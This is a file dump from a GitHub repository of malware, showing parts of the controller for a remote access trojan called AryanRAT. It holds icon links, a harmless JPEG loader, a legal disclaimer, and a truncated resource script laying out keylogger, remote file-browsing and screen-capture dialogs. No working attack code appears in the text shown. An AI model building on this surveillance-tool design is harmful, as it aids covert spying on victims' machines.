https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Internet Explorer.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Media Clip_ico_1.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Media Clip_ico_1.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/MyJPEGHandler.h:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | /* **************************************************************** */
6 | /* * FUNCTION LoadAnImage: * */
7 | /* * INPUT: path to the JPEG picture file * */
8 | /* * OUTPUT: HBITMAP of loaded JPEG picture or 0 on error loading * */
9 | /* **************************************************************** */
10 | HBITMAP LoadJPEG(char* FileName)
11 | {
12 | // Use IPicture stuff to use JPG / GIF files
13 | IPicture* p;
14 | IStream* s;
15 | // IPersistStream* ps;
16 | HGLOBAL hG;
17 | void* pp;
18 | FILE* fp;
19 |
20 |
21 | // Read JPEG file in memory
22 | fp = fopen(FileName,"rb");
23 | if (!fp) return NULL;
24 |
25 | fseek(fp,0,SEEK_END);
26 | int fs = ftell(fp);
27 | fseek(fp,0,SEEK_SET);
28 | hG = GlobalAlloc(GPTR,fs);
29 | if (!hG){ fclose(fp); return NULL; }
30 | pp = (void*)hG;
31 | fread(pp,1,fs,fp);
32 | fclose(fp);
33 |
34 | // Create an IStream so IPicture can
35 | CreateStreamOnHGlobal(hG,false,&s);
36 | if (!s){ GlobalFree(hG); return NULL; }
37 |
38 | OleLoadPicture(s,0,false,IID_IPicture,(void**)&p);
39 |
40 | if (!p){ s->Release(); GlobalFree(hG); return NULL; }
41 | s->Release();
42 | GlobalFree(hG);
43 |
44 | HBITMAP hB = 0;
45 | p->get_Handle((unsigned int*)&hB);
46 |
47 | // Copy the image. Necessary, because upon p's release,
48 | // the handle is destroyed.
49 | HBITMAP hBB = (HBITMAP)CopyImage(hB,IMAGE_BITMAP,0,0,LR_COPYRETURNORG);
50 |
51 | p->Release();
52 | return hBB;
53 | }
54 |
55 |
56 |
--------------------------------------------------------------------------------
/AryanRAT/Client/PausePressed.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/PausePressed.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Play.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Play.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/Stop1NormalRed.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/Stop1NormalRed.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/WINDOWS:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/WINDOWS
--------------------------------------------------------------------------------
/AryanRAT/Client/_default.pif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/_default.pif
--------------------------------------------------------------------------------
/AryanRAT/Client/arrow_down.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/arrow_down.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/arrow_up.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/arrow_up.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/bags jugs.dat:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/bags jugs.dat
--------------------------------------------------------------------------------
/AryanRAT/Client/bootstat.dat:
--------------------------------------------------------------------------------
1 | ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������
--------------------------------------------------------------------------------
/AryanRAT/Client/display-32x32.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/display-32x32.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/dos.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/dos.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/drive_cd.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/drive_cd.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/drive_disk.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/drive_disk.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/drive_network.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/drive_network.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/eula.txt:
--------------------------------------------------------------------------------
1 | Aryan V0.4 DISCLAIMER
2 |
3 | THIS DISCLAIMER REPRESENTS A CONTRACT BETWEEN YOU AND AlbinoSkunk. AFTER READING, YOU WILL BE ASKED TO ACCEPT THIS AGREEMENT AND CONTINUE TO USE THE SOFTWARE, OR, IF YOU DO NOT WISH TO ACCEPT THIS AGREEMENT, TO EXIT, IN WHICH CASE YOU WILL NOT BE ABLE TO USE, INSTALL OR OPERATE THE SOFTWARE. BY USING THIS SOFTWARE YOU ACCEPT ALL THE TERMS AND CONDITIONS OF THIS AGREEMENT.
4 |
5 | This disclaimer is a legal agreement between you (henceforth referred to as "the User") and AlbinoSkunk, regarding the software application Aryan (henceforth referred to as "the Software") which you have downloaded, or otherwise obtained through other resources or media such as CD-ROMs, floppy disks, or through a network in object code form or other related services.
6 |
7 | By accessing, downloading, storing, loading, installing, executing, displaying, copying the Software into the memory of a computer or otherwise benefiting from using the functionality of the Software in accordance with the documentation, you agree to be bound by the terms of this agreement. If you do not agree to the terms and conditions of this Agreement, AlbinoSkunk is unwilling to grant usage of the Software to you. In such event, you may not Operate or use the Software in any way.
8 |
9 | BY CLICKING THE "I AGREE" BUTTON IT IS INTERPRETED AS A SYMBOL OF YOUR SIGNATURE AND YOU ARE THEREBY CONSENTING TO BE BOUND BY THIS AGREEMENT AND AGREE THAT IT IS ENFORCEABLE LIKE ANY WRITTEN NEGOTIATED AGREEMENT SIGNED BY YOU. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, CLICK THE EXIT BUTTON REMOVE THE SOFTWARE FROM YOUR COMPUTER.
10 |
11 | By running this Software, you are consenting to be bound by this agreement. Upon termination of this agreement you will no longer be authorized to operate or use the Software in any way. The Software will not run on your computer unless or until you accept the terms of this agreement.
12 |
13 | 1. Proprietary Ownership Rights.
14 |
15 | You agree that the Software and any associated ideas, methods of operation, documentation and other information contained in the Software, are intellectual properties of AlbinoSkunk. You acknowledge that the source code for the Software is proprietary to AlbinoSkunk. You agree not to modify, adapt, translate, reverse engineer, decompile, disassemble or otherwise attempt to discover the source code of the Software. You may not remove any proprietary notices or labels on the Software.
16 |
17 | 2. Usage.
18 |
19 | AlbinoSkunk grants you permission to store, load, install and execute the specified version of the Software on an unlimited number of computers, workstations, personal digital assistants, mobile phones, hand-held devices, or other electronic devices for which the software was designed provided you are in compliance with the terms and conditions set out in this agreement. By accepting this agreement, you agree not to use the Software to:
20 |
21 | a.) Obtain unauthorized access to computer systems or electronic devices. You, the User, will be held accountable for using the Software to obtain unauthorised access to any computer system or device. By using the Software on a machine you are not authorised to do so, you are violating the terms of this disclaimer and therefore you, the User, agree to accept full responsibility for the consequences of improper usage of the Software.
22 |
23 | b.) Cause unauthorized modification. By accepting this agreement you hereby agree that you will not use the Software to cause unauthorised modification on any computer system or electronic device. By abusing the software to cause unauthorised modifications to a computer system or electronic device you are violating the terms of this disclaimer and you, the User, agree to accept full responsibility for the consequences of improper usage of the Software.
24 |
25 | c.) Cause the intentional loss or deletion of any type of data or information. By accepting this agreement you hereby agree that you will not use the Software to cause the intentional loss of data on a computer system or electronic device you are not authorised to access. By accepting this agreement you, the User, agree to accept full responsibility for the consequences that may result as well as total liability for accidental or intentional damage to any computer hardware or software, including damages caused by computer stoppages or crashes.
26 |
27 | d.) Endanger public safety. You agree that the Software will in no way, shape or form be used to endanger public safety.
28 |
29 | e.) Engage in denial of service attacks. You agree not to use the Software to participate, engage or otherwise contribute to any denial of service type attacks over the internet or any other network of computers or electronic devices.
30 |
31 | INTENTIONALLY SPREADING APPLICATIONS FOR MALICIOUS OR DAMAGING PURPOSES IS A CRIME PUNISHABLE BY FINE OR IMPRISONMENT. BY USING AlbinoSkunk PRODUCTS FOR MALICIOUS PURPOSES YOU ARE BREAKING THE TERMS AND CONDITIONS SET IN THIS AGREEMENT AND THEREFORE ACCEPT FULL RESPONSIBILITY FOR ANY CONSEQUENCES WHICH MAY RESULT FROM YOUR ACTIONS.
32 |
33 | 3. High Risk Activities.
34 |
35 | The Software is not designed or intended for use as on-line control equipment in hazardous environments requiring fail-safe performance, such as in the operation of nuclear facilities, aircraft navigation or communication systems, air traffic control, direct life support machines or weapon systems in which the failure of the Software could lead directly to death, personal injury or severe physical or environmental damage ("high risk activities"). Accordingly, AlbinoSkunk specifically disclaims any express or implied warranty of fitness for High Risk Activities.
36 |
37 | 4. Disclaimer of Warranty.
38 |
39 | The Software is provided on an AS IS basis, without warranty of any kind. The entire risk as to the quality and performance of the software is borne by you, the User. Should the Software prove defective in any respect, the User, not AlbinoSkunk or any of its staff or associates, shall assume the cost of any service and repair.
40 |
41 | 5. LIMITATION OF LIABILITY.
42 |
43 | UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT OR OTHERWISE, SHALL AlbinoSkunk OR IT'S ASSOCIATES BE LIABLE TO THE USER, OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOSS OF GOODWILL, PROFIT, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL AlbinoSkunk BE LIABLE FOR ANY DAMAGES CAUSED BY IMPROPER OR UNAUTHORISED USAGE OF THE SOFTWARE, EVEN IF THE USER HAS BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY THIRD PARTY.
44 |
45 | 5.1 NO IMPLIED OR OTHER WARRANTIES.
46 |
47 | THE SOFTWARE IS PROVIDED "AS IS", WITH NO WARRANTIES WHATSOEVER; AlbinoSkunk DOES NOT, EITHER EXPRESSED, IMPLIED OR STATUTORY, MAKE ANY WARRANTIES, CLAIMS OR REPRESENTATIONS WITH RESPECT TO THE SOFTWARE, INCLUDING, WITHOUT LIMITATION, WARRANTIES OF QUALITY, PERFORMANCE, NON-INFRINGEMENT, MERCHANTABILITY, OR FITNESS FOR USE OR A PARTICULAR PURPOSE. AlbinoSkunk FURTHER DOES NOT REPRESENT OR WARRANT THAT THE SOFTWARE WILL ALWAYS BE AVAILABLE, ACCESSIBLE, UNINTERRUPTED, TIMELY, SECURE, ACCURATE, COMPLETE AND ERROR-FREE, NOR DOES AlbinoSkunk WARRANT ANY CONNECTION TO OR TRANSMISSION FROM THE INTERNET USING THE SOFTWARE. YOU ASSUME ALL RISKS AND RESPONSIBILITIES FOR SELECTION OF THE SOFTWARE TO ACHIEVE YOUR INTENDED RESULTS, AND FOR THE INSTALLATION OF, USE OF, AND RESULTS OBTAINED FROM THE SOFTWARE. AlbinoSkunk MAKES NO WARRANTY THAT THE SOFTWARE WILL BE ERROR FREE OR FREE FROM INTERRUPTION OR FAILURE, OR THAT IT IS COMPATIBLE WITH ANY PARTICULAR HARDWARE OR SOFTWARE. TO THE MAXIMUM EXTENT PERMITTED BY APPLICABLE LAW, AlbinoSkunk DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO IMPLIED WARRANTIES OF MERCHANTABILITY, NON-INFRINGEMENT OF THIRD PARTY RIGHTS, INTEGRATION, SATISFACTORY QUALITY OR FITNESS FOR ANY PARTICULAR PURPOSE WITH RESPECT TO THE SOFTWARE AND THE ACCOMPANYING WRITTEN MATERIALS OR THE USE THEREOF. THEREFORE, AlbinoSkunk EXPRESSLY DISCLAIMS ANY EXPRESS OR IMPLIED WARRANTY REGARDING SYSTEM AND/OR SOFTWARE AVAILABILITY, ACCESSIBILITY, OR PERFORMANCE. AlbinoSkunk DISCLAIMS ANY AND ALL LIABILITY FOR THE LOSS OF DATA DURING ANY COMMUNICATIONS AND ANY LIABILITY ARISING FROM OR RELATED TO ANY FAILURE BY AlbinoSkunk TO TRANSMIT ACCURATE OR COMPLETE INFORMATION TO YOU.
48 |
49 | 5.2 LIMITED LIABILITY; NO LIABILITY FOR CONSEQUENTIAL DAMAGES.
50 |
51 | NEITHER AlbinoSkunk NOR ITS ASSOCIATES SHALL BE LIABLE TO THE USER OR ANY THIRD PARTY FOR ANY INDIRECT, SPECIAL, INCIDENTAL, COVER OR CONSEQUENTIAL DAMAGES INCLUDING, BUT NOT LIMITED TO, DAMAGES FOR THE INABILITY TO USE THE SOFTWARE OR LOSS OF GOODWILL, PROFIT, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, ARISING OUT OF THE USE OF, OR INABILITY TO USE THE SOFTWARE AND BASED ON ANY THEORY OF LIABILITY INCLUDING BREACH OF CONTRACT, BREACH OF WARRANTY, TORT (INCLUDING NEGLIGENCE), PRODUCT LIABILITY OR OTHERWISE, EVEN IF AlbinoSkunk HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES AND EVEN IF A REMEDY SET FORTH HEREIN IS FOUND TO HAVE FAILED ITS ESSENTIAL PURPOSE. AlbinoSkunkS TOTAL LIABILITY TO YOU FOR ACTUAL DAMAGES FOR ANY CAUSE WHATSOEVER WILL BE LIMITED TO THE AMOUNT PAID BY YOU FOR THE SOFTWARE THAT CAUSED SUCH DAMAGE.
--------------------------------------------------------------------------------
/AryanRAT/Client/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/favicon.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/file_pau.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/file_pau.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/film.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/film.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/firefox-icon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/firefox-icon.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/firefox.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/firefox.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/folder.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/folder.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/green.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/green.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/hiberfil.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/hiberfil.sys
--------------------------------------------------------------------------------
/AryanRAT/Client/icon1.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/icon1.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/icon2.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/icon2.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/image.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/image.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/new(1).ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/new(1).ico
--------------------------------------------------------------------------------
/AryanRAT/Client/ntldr:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/ntldr
--------------------------------------------------------------------------------
/AryanRAT/Client/orange.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/orange.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/pagefile.sys:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/pagefile.sys
--------------------------------------------------------------------------------
/AryanRAT/Client/process.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/process.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/progman_exe_Ico22_ico_Ico1.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Viper4K/malware/0d0b09eb164e54b46d4f6fde5b28a4dd143e765a/AryanRAT/Client/progman_exe_Ico22_ico_Ico1.ico
--------------------------------------------------------------------------------
/AryanRAT/Client/res.rc:
--------------------------------------------------------------------------------
1 | //Microsoft Developer Studio generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "afxres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // French (France) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_FRA)
19 | #ifdef _WIN32
20 | LANGUAGE LANG_FRENCH, SUBLANG_FRENCH
21 | #pragma code_page(1252)
22 | #endif //_WIN32
23 |
24 | #ifdef APSTUDIO_INVOKED
25 | /////////////////////////////////////////////////////////////////////////////
26 | //
27 | // TEXTINCLUDE
28 | //
29 |
30 | 1 TEXTINCLUDE DISCARDABLE
31 | BEGIN
32 | "resource.h\0"
33 | END
34 |
35 | 2 TEXTINCLUDE DISCARDABLE
36 | BEGIN
37 | "#include ""afxres.h""\r\n"
38 | "\0"
39 | END
40 |
41 | 3 TEXTINCLUDE DISCARDABLE
42 | BEGIN
43 | "\r\n"
44 | "\0"
45 | END
46 |
47 | #endif // APSTUDIO_INVOKED
48 |
49 | #endif // French (France) resources
50 | /////////////////////////////////////////////////////////////////////////////
51 |
52 |
53 | /////////////////////////////////////////////////////////////////////////////
54 | // English (U.K.) resources
55 |
56 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENG)
57 | #ifdef _WIN32
58 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_UK
59 | #pragma code_page(1252)
60 | #endif //_WIN32
61 |
62 | /////////////////////////////////////////////////////////////////////////////
63 | //
64 | // Dialog
65 | //
66 |
67 | IDD_DIALOG1 DIALOGEX 0, 0, 446, 146
68 | STYLE DS_LOCALEDIT | DS_CENTER | WS_MINIMIZEBOX | WS_POPUP | WS_VISIBLE |
69 | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
70 | CAPTION "Aryan Client."
71 | MENU IDR_MENU2
72 | FONT 8, "MS Sans Serif", 0, 0, 0x1
73 | BEGIN
74 | CONTROL "List1",IDC_SERVERLIST,"SysListView32",LVS_REPORT |
75 | LVS_SHOWSELALWAYS | WS_TABSTOP,401,86,40,12,
76 | WS_EX_CLIENTEDGE
77 | CONTROL "List1",IDC_LOGS,"SysListView32",LVS_REPORT |
78 | LVS_SHOWSELALWAYS | WS_TABSTOP,401,74,39,10,
79 | WS_EX_CLIENTEDGE
80 | EDITTEXT IDC_MAINPORT,56,10,137,13,ES_AUTOHSCROLL
81 | EDITTEXT IDC_FILEPORT,230,9,137,12,ES_AUTOHSCROLL
82 | EDITTEXT IDC_IPADDRESS,230,42,137,12,ES_AUTOHSCROLL
83 | EDITTEXT IDC_SERIVCENAME,56,42,137,12,ES_AUTOHSCROLL
84 | PUSHBUTTON "Ok",IDC_OKSETTING,378,105,67,12,0,WS_EX_CLIENTEDGE
85 | GROUPBOX "Connection",IDC_SETTINGS,4,1,437,28
86 | GROUPBOX "UPnP",IDC_SETTINGS2,3,34,437,28
87 | LTEXT " Main Port:",IDC_SETTINGTEXT3,9,12,34,9
88 | LTEXT " File Port :",IDC_SETTINGTEXT2,195,12,33,9
89 | LTEXT " Service Name:",IDC_SETTINGTEXT,0,44,56,9
90 | LTEXT " Local IP:",IDC_SETTINGTEXT1,195,43,33,9
91 | GROUPBOX "Keylogger Colours",IDC_KEYLOGGERCOLOURS,3,65,242,54
92 | LTEXT " Keys :",IDC_KEYSCOLOUR,11,77,28,9
93 | EDITTEXT IDC_KEYCOLOUR,62,74,40,12,ES_AUTOHSCROLL
94 | LTEXT " Time Stamp :",IDC_KEYSCOLOUR2,10,88,46,9
95 | EDITTEXT IDC_KEYCOLOUR2,62,86,40,12,ES_AUTOHSCROLL
96 | LTEXT " Window Title:",IDC_KEYSCOLOUR3,130,88,47,9
97 | EDITTEXT IDC_KEYCOLOUR3,179,87,40,12,ES_AUTOHSCROLL
98 | PUSHBUTTON "..",IDC_WINDOWTEXT,222,87,19,9
99 | PUSHBUTTON "..",IDC_TIME,105,87,19,9
100 | PUSHBUTTON "..",IDC_TEXTNORMAL,106,75,19,9
101 | EDITTEXT IDC_KEYCOLOUR4,179,74,40,12,ES_AUTOHSCROLL
102 | PUSHBUTTON "..",IDC_BACKGROUND,222,75,19,9
103 | LTEXT " BackGround :",IDC_KEYSCOLOUR4,131,75,48,9
104 | CONTROL "Tab6",IDC_TAB3,"SysTabControl32",TCS_BOTTOM |
105 | TCS_FIXEDWIDTH,0,0,446,136
106 | END
107 |
108 | IDD_DIALOG3 DIALOGEX 0, 0, 411, 190
109 | STYLE WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU
110 | CAPTION "a"
111 | FONT 8, "MS Sans Serif", 0, 0, 0x1
112 | BEGIN
113 | CONTROL "List1",IDC_TASKLIST,"SysListView32",LVS_REPORT |
114 | LVS_SINGLESEL | WS_BORDER | WS_TABSTOP,4,17,403,159,
115 | WS_EX_CLIENTEDGE
116 | CONTROL "Tab1",IDC_TAB1,"SysTabControl32",TCS_FORCELABELLEFT |
117 | TCS_FIXEDWIDTH,0,0,411,176,WS_EX_CLIENTEDGE
118 | END
119 |
120 | IDD_FILE DIALOGEX 0, 0, 360, 257
121 | STYLE WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
122 | FONT 8, "MS Sans Serif", 0, 0, 0x1
123 | BEGIN
124 | CONTROL "Tree1",IDC_TREE1,"SysTreeView32",TVS_HASBUTTONS |
125 | TVS_HASLINES | TVS_LINESATROOT | TVS_SHOWSELALWAYS |
126 | WS_TABSTOP,0,214,13,11,WS_EX_CLIENTEDGE
127 | CONTROL "List1",IDC_FILELIST,"SysListView32",LVS_REPORT |
128 | LVS_SORTASCENDING | LVS_EDITLABELS | WS_TABSTOP,13,214,
129 | 28,11,WS_EX_CLIENTEDGE
130 | CONTROL "List1",IDC_DOWNLOADS,"SysListView32",LVS_REPORT |
131 | WS_TABSTOP,0,226,149,21,WS_EX_CLIENTEDGE
132 | CONTROL "Tab1",IDC_TAB4,"SysTabControl32",0x0,0,0,359,16
133 | CONTROL "List1",IDC_SEARCHLIST,"SysListView32",LVS_REPORT |
134 | WS_TABSTOP,0,35,359,186,WS_EX_CLIENTEDGE
135 | EDITTEXT IDC_DIR,15,22,126,12,ES_AUTOHSCROLL
136 | PUSHBUTTON "Search",IDC_SEARCH,303,22,56,13,0,WS_EX_CLIENTEDGE
137 | EDITTEXT IDC_FILENAME,181,22,110,12,ES_AUTOHSCROLL
138 | LTEXT "FileName :",IDC_STATICB,143,24,34,8
139 | LTEXT "Dir:",IDC_STATICA,3,23,13,10
140 | EDITTEXT IDC_ID,321,233,38,10,ES_AUTOHSCROLL
141 | END
142 |
143 | IDD_RENAME DIALOGEX 0, 0, 208, 25
144 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
145 | EXSTYLE WS_EX_TOOLWINDOW
146 | CAPTION "Rename"
147 | FONT 8, "MS Sans Serif", 0, 0, 0x1
148 | BEGIN
149 | LTEXT "NewName:",IDC_STATIC,7,0,39,8
150 | EDITTEXT IDC_NAME,7,10,165,12,ES_AUTOHSCROLL
151 | PUSHBUTTON "Set",IDC_SETNAME,176,9,32,13
152 | END
153 |
154 | IDD_KEYLOG DIALOGEX 0, 0, 286, 150
155 | STYLE WS_MINIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
156 | MENU IDR_KEY
157 | FONT 8, "MS Sans Serif", 0, 0, 0x1
158 | BEGIN
159 | CONTROL "",IDC_KEYS,"RICHEDIT",ES_MULTILINE | ES_AUTOVSCROLL |
160 | ES_READONLY | WS_VSCROLL | WS_TABSTOP,177,0,103,49,
161 | WS_EX_CLIENTEDGE
162 | CONTROL "",IDC_KEYS2,"RICHEDIT",ES_MULTILINE | ES_AUTOVSCROLL |
163 | ES_READONLY | WS_VSCROLL | WS_TABSTOP,37,42,142,53,
164 | WS_EX_CLIENTEDGE
165 | CONTROL "Tab1",IDC_TAB2,"SysTabControl32",TCS_BOTTOM,0,10,286,
166 | 114
167 | EDITTEXT IDC_ID,0,0,38,10,ES_AUTOHSCROLL
168 | END
169 |
170 | IDD_CONNECT DIALOG DISCARDABLE 0, 0, 1, 0
171 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
172 | CAPTION "Dialog"
173 | FONT 8, "MS Sans Serif"
174 | BEGIN
175 | END
176 |
177 | IDD_SCREEN_ABD DIALOGEX 0, 0, 243, 172
178 | STYLE WS_MAXIMIZEBOX | WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
179 | CAPTION "Dialog"
180 | FONT 8, "MS Sans Serif"
181 | BEGIN
182 | CONTROL "Progress2",IDC_PROGRESS,"msctls_progress32",PBS_SMOOTH,
183 | 0,166,216,6,WS_EX_CLIENTEDGE
184 | CONTROL "Slider1",IDC_SLIDER1,"msctls_trackbar32",TBS_VERT |
185 | TBS_BOTH | TBS_NOTICKS | WS_TABSTOP,224,1,18,156
186 | EDITTEXT IDC_ID,133,132,38,10,ES_AUTOHSCROLL
187 | EDITTEXT IDC_SLEEP,217,160,26,12
188 | END
189 |
190 | IDD_SETTINGS DIALOGEX 0, 0, 155, 147
191 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
192 | CAPTION "Settings"
193 | FONT 8, "MS Sans Serif", 0, 0, 0x1
194 | BEGIN
195 | GROUPBOX "Connection Settings",IDC_STATIC,6,0,144,61
196 | LTEXT " Main Port:",IDC_STATIC,9,9,34,9
197 | LTEXT " File Port :",IDC_STATIC,13,32,33,11
198 | EDITTEXT IDC_MAINPORT,9,18,137,13,ES_AUTOHSCROLL
199 | EDITTEXT IDC_FILEPORT,9,43,137,12,ES_AUTOHSCROLL
200 | GROUPBOX "UPnP service Info",IDC_STATIC,6,64,143,69
201 | LTEXT " Service Name",IDC_STATIC,6,72,62,9
